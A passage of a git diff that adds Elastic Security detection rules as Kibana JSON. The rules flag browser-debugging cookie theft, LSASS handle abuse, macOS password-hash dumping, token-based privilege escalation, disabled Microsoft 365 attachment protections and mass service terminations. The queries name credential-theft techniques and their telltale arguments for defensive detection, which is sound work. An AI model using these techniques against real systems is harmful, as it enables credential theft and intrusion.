"name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "0136b315-b566-482f-866c-1d8e2477ba16_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_105.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_105.json new file mode 100644 index 00000000000..1a73939d6f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_105.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a Chromium based browser with the debugging process argument, which may indicate an attempt to steal authentication cookies. An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials.", + "false_positives": [ + "Developers performing browsers plugin or extension debugging." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Potential Cookies Theft via Browser Debugging", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name in (\n \"Microsoft Edge\",\n \"chrome.exe\",\n \"Google Chrome\",\n \"google-chrome-stable\",\n \"google-chrome-beta\",\n \"google-chrome\",\n \"msedge.exe\") and\n process.args : (\"--remote-debugging-port=*\",\n \"--remote-debugging-targets=*\",\n \"--remote-debugging-pipe=*\") and\n process.args : \"--user-data-dir=*\" and not process.args:\"--remote-debugging-port=0\"\n", + "references": [ + "https://github.com/defaultnamehere/cookie_crimes", + "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/chrome_cookies.md", + "https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1539", + "name": "Steal Web Session Cookie", + "reference": "https://attack.mitre.org/techniques/T1539/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_6.json b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_6.json new file mode 100644 index 00000000000..4852b3b5c32 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_6.json 
@@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process running as SYSTEM and impersonating a Windows core binary privileges. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Created with an Elevated Token", + "query": "/* This rule is only compatible with Elastic Endpoint 8.4+ */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* CreateProcessWithToken and effective parent is a privileged MS native binary used as a target for token theft */\n user.id : \"S-1-5-18\" and\n\n /* Token Theft target process usually running as service are located in one of the following paths */\n process.Ext.effective_parent.executable :\n (\"?:\\\\Windows\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*\") and\n\n/* Ignores Utility Manager in Windows running in debug mode */\n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and process.parent.args : \"/debug\") and\n\n/* Ignores Windows print spooler service with correlation to Access Intelligent Form */\nnot (process.parent.executable : \"?\\\\Windows\\\\System32\\\\spoolsv.exe\" and\n process.executable: \"?:\\\\Program Files*\\\\Access\\\\Intelligent Form\\\\*\\\\LaunchCreate.exe\") and \n\n/* Ignores Windows error reporting executables */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\windows\\\\system32\\\\WerMgr.exe\",\n 
\"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n /* Ignores Windows updates from TiWorker.exe that runs with elevated privileges */\n not (process.parent.executable : \"?:\\\\Windows\\\\WinSxS\\\\*\\\\TiWorker.exe\" and\n process.executable : (\"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\inetsrv\\\\iissetup.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\aspnetca.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\inetsrv\\\\aspnetca.exe\",\n \"?:\\\\Windows\\\\System32\\\\lodctr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\lodctr.exe\",\n \"?:\\\\Windows\\\\System32\\\\netcfg.exe\",\n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*\\\\ngen.exe\",\n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*\\\\aspnet_regiis.exe\")) and\n\n\n/* Ignores additional parent executables that run with elevated privileges */\n not process.parent.executable : \n (\"?:\\\\Windows\\\\System32\\\\AtBroker.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\", \n \"?:\\\\Program Files (x86)\\\\*.exe\", \n \"?:\\\\Program Files\\\\*.exe\", \n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\*\") and\n\n/* Ignores Windows binaries with a trusted signature and specific signature name */\n not (process.code_signature.trusted == true and\n process.code_signature.subject_name : \n (\"philandro Software GmbH\", \n \"Freedom Scientific Inc.\", \n \"TeamViewer Germany GmbH\", \n \"Projector.is, Inc.\", \n \"TeamViewer GmbH\", \n \"Cisco WebEx LLC\", \n \"Dell Inc\"))\n", + "references": [ + "https://lengjibo.github.io/token/", + "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 
"event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "02a23ee7-c8f8-4701-b99d-e9038ce313cb", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "02a23ee7-c8f8-4701-b99d-e9038ce313cb_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_208.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_208.json new file mode 100644 index 00000000000..c57f3d8d643 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_208.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to an LSASS handle via DuplicateHandle from an unknown call trace module. This may indicate an attempt to bypass the NtOpenProcess API to evade detection and dump LSASS memory for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via DuplicateHandle in LSASS", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n\n /* LSASS requesting DuplicateHandle access right to another process */\n process.name : \"lsass.exe\" and winlog.event_data.GrantedAccess == \"0x40\" and\n\n /* call is coming from an unknown executable region */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"\n", + "references": [ + "https://github.com/CCob/MirrorDump" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.GrantedAccess", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "02a4576a-7480-4284-9327-548a806b5e48", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 208 + }, + "id": "02a4576a-7480-4284-9327-548a806b5e48_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_106.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_106.json new file mode 100644 index 00000000000..2dea41db489 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_106.json 
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of macOS built-in commands used to dump user account hashes. Adversaries may attempt to dump credentials to obtain account login information in the form of a hash. These hashes can be cracked or leveraged for lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Dumping Account Hashes via Built-In Commands", + "query": "event.category:process and host.os.type:macos and event.type:start and\n process.name:(defaults or mkpassdb) and process.args:(ShadowHashData or \"-dump\")\n", + "references": [ + "https://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored", + "https://www.unix.com/man-page/osx/8/mkpassdb/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "02ea4563-ec10-4974-b7de-12e65aa4f9b3", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "02ea4563-ec10-4974-b7de-12e65aa4f9b3_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_103.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_103.json new file mode 100644 index 00000000000..c506239682e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_103.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A safe attachment rule may be disabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + 
], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_105.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_105.json new file mode 100644 index 00000000000..9bfbb70fdd6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_105.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A safe attachment rule may be disabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + 
], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_206.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_206.json new file mode 100644 index 00000000000..ffd6e920384 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_206.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A safe attachment rule may be disabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + 
], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_108.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_108.json new file mode 100644 index 00000000000..352aa4d6e6c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_108.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a high number (10) of process terminations (stop, delete, or suspend) from the same host within a short time period.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "High Number of Process and/or Service Terminations", + "note": "## Triage and analysis\n\n### Investigating High Number of Process and/or Service Terminations\n\nAttackers can stop services and kill processes for a variety of purposes. For example, they can stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted, or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of service and/or process terminations (stop, delete, or suspend) from the same host within a short time period.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and\n process.args:(stop or pause or delete or \"/PID\" or \"/IM\" or \"/T\" or \"/F\" or \"/t\" or \"/f\" or \"/im\" or \"/pid\") and\n not process.parent.name:osquerybeat.exe\n", + "references": [ + "https://www.elastic.co/security-labs/luna-ransomware-attack-pattern" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "035889c4-2686-4583-a7df-67f89c292f2c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 108 + }, + "id": "035889c4-2686-4583-a7df-67f89c292f2c_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_109.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_109.json new file mode 100644 index 00000000000..ec5a45cf73a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_109.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a high number (10) of process terminations (stop, delete, or suspend) from the same host within a short time period.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "High Number of Process and/or Service Terminations", + "note": "## Triage and analysis\n\n### Investigating High Number of Process and/or Service Terminations\n\nAttackers can stop services and kill processes for a variety of purposes. For example, they can stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted, or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of service and/or process terminations (stop, delete, or suspend) from the same host within a short time period.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
